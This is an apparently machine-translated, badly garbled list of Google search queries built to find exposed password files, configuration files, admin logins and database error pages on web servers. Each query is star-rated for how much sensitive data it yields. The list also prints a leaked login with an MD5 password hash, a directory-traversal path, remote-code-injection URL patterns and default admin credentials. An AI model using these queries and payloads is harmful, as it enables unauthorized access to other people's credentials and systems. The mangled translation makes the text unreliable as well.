The form given in the future is such that the rear of the numbers is to go Google search, followed by introducing and vulnerability how to use, because the time is restricted, so if you are interested, if you are interested in your own translation Bar .. 1.Intitle: login intexT: "RT IS? CopyRight"
RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check out
SecurityFOCUS BID 7509
Click here to Google Search ==> INTITLE: Login Intext: "RT IS? CopyRight"
2.INTEXT: "" Bitboard V2.0 "Bitshifters Bulletin Board"
The Bitboard2 Is A Board That Need No Database To Work. So it is useful for Webmaster That Have No Access To a SQL Database. The password file can be retrieve from / admin / data_passwd.dat
Click here to Google Search ==> Intext: "Bitboard V2.0" Bitshifters Bulletin Board "
3.ext: php program_listing intitle: mythweb.program.listic
Mythtv Is A Homebrew PVR Project That I'VE. IT'S BEEN Under Heavy Development for Two Years, and is now Quite Useable and Featureful
Google ==> EXT: PHP Program_LISTING INTITLE: Mythweb.Program.LISTING
4.intitle: index.of abyss.conf
Thase Director Reveal The Configuration File of The Abyss Web Server. These Files CAN Contain Passwords.
Google ==> INTITLE: INDEX.OF ABYSS.CONF
Given period, <-! StartFragment -> MIMEType video / quicktime qt movMIMEType video / x-msvideo aviVersion 1.2.1.0login jagmalpassword 5797ae9674912849532661d479f24751 We saw a guess, yes this is the md5 algorithm.
5.inurl: preferences.ini "[emule]" (5 stars)
THIS FINDS The Emule Configuration File Which Contains Some General and Proxy Information.sometimes Proxy User and Password Arend.
Google ==> Inurl: preferences.ini "[emule]" 6.ext: ini eudora.ini (4 stars)
Well, this is The Configuration File for eudora ... May Contain Sensitive Information Like Pop Servers, Logins and Encypted Passwords Sometimes.
Click Here for the Google Search ==> Ext: Ini Eudora.ini
7.intitle: "INDEX OF / CFIDE /" Administrator
With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably should not be seeing .. entering the 'Administrator' Directory Brings Up A Coldfusion Login Screen
Click Here for the Google Search ==> INTITLE: "INDEX OF / CFIDE /" Administrator
8. "# -frontpage-" InURL: Service.PWD (superstar level) FrontPage .. Very Nice Clean Search Results Required ..
Click Here for the Google Search ==> "# -frontpage-" InURL: Service.PWD
9.PassList.txt (a better way) (5 star level)
Cleartext Passwords. No Decryption Required!
Click Here for the Google Search ==> Inout: Passlist.txt
10.index.of.password (5 stars)
These directories are named "password." I wonder what you might find in here Warning:. Sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things liks "horny.htm" or "brittany.htm . "THESE is to boost their search results. Don't click to be (unless Avalanche Of P0RN ...
Click Here for the Google Search ==> Index.Of.Password
11. "Access Denied for User" "Using Password" (5 stars)
Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers ... Click here for the Google search ==> "access denied for user" "useing password "
12.Auth_user_file.txt (4 stars)
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program (!!!). Some lists are bigger than others, all are fun, and all belong to Googledorks. =)
Click Here for the Google Search ==> AllinURL: Auth_user_File.txt
13.http:// *: * @ www "DomainName"
This is a query to get Inline Passwords from search Engines (not just google), you must type in the query followed with the the domain name without the .com or .net
"http:// *: * @ www" Bangbus or "http:// *: * @ www" Bangbus
Another Way Is By Just Typing "http: // bob: bob @ www"
Click Here for the Google Search ==> "http: // *: * @ www" bob: bob
(The harm is particularly great hope to do things, otherwise it will violate my original intention, I hope everyone will cooperate, otherwise this column is not open.)
ORA-00921: UNEXPECTED End of Sql Command (5 stars)
Another SQL ERROR Message from Cesar. This One Coughs Up Full Web Pathnames and / OR PHP FileNames.
Click Here for the Google Search ==> "ORA-00921: Unexpected End of Sql Command" 14: EXT: PHP INTEXT: "Powered by PhpNewman Version"
PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more.PHP News Manager is vulnerable to a directory traversal problem Path / to / news / browse.php? clang = .. / .. / .. / .. / .. / .. / file / I / wantclick here for the google search ==> EXT: PHP INTEXT: " Powered by PHPNEWMAN VERSION
15: InURL: "/ becommunity / community / index.php? PageURL =" (E-Market Remote Code Execution)
E-Market Is Commercial Software Made by a Korean Company (http://www.bbs2000.co.kr). A Vulnerability In this Software Was Reported to Bugtraq. The Exploit is Possible with the index.php script:
http: // [target] /becommunity/community/index.php?pageurl= [INJECTION URL] http: // [target] /becommunity/community/index.php?from_market=y&pageURL = [Injection URL]
For more information read this: http://echo.or.id/adv/adv06-y3dips-2004.txt author: y3dipsdate: sept, 7th 2004location: IndoSian, Jakarta
Click Here for the Google Search ==> Inurl: "/ Becommunity / Community / Index.php? PageURL ="
16. Intitle: "ASP Fileman" resend -site: Iisworks.com (5 stars)
FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database.
Default User: user = admin, pass = pass
In the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can Be Downloaded and The Passwords Are Not Encrypted.site Admins Have Been Notified. AS Always: Do Not Abuse this.
Click Here for the Google Search ==> INTITLE: "ASP Fileman" resend -site: Iisworks.com
17. "Bosdates Calendar System" "Powered by bosdates v3.2 by bosdev"
"BOSDATES IS A FLEXible Calendar System Which Allows for Multiple Calendars, Email Notifications, REPEATING Events and MUCH MORE. All of Which Are Easily Maintained by Even The Least Technical Uses.
THERE IS A Vulnerability In Bosdates That Allows An Attacker To Disclose Sensitive Information. Vulnerability Description Address: http://www.zone-h.org/en/advisories/read/ID=3925/
Click Here for the Google Search ==> "Bosdates Calendar System" "Powered by bosdates v3.2 by bosdev"
18. "Enter IP" InURL: "PHP-PING.PHP"
It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php Script.
Vulnerability Utilization: http://www.securityfocus.com/bid/9309/EXPLOIT/
Example: http://img64.exs.cx/my.php? LOC = IMG64 & image = phpping.jpg
19: EXT: conf INURL: rsyncd.conf -cvs -man
rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to "rsync servers" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and pathsClick here for the Google search ==> ext: conf Inurl: rsyncd.conf -cvs -man
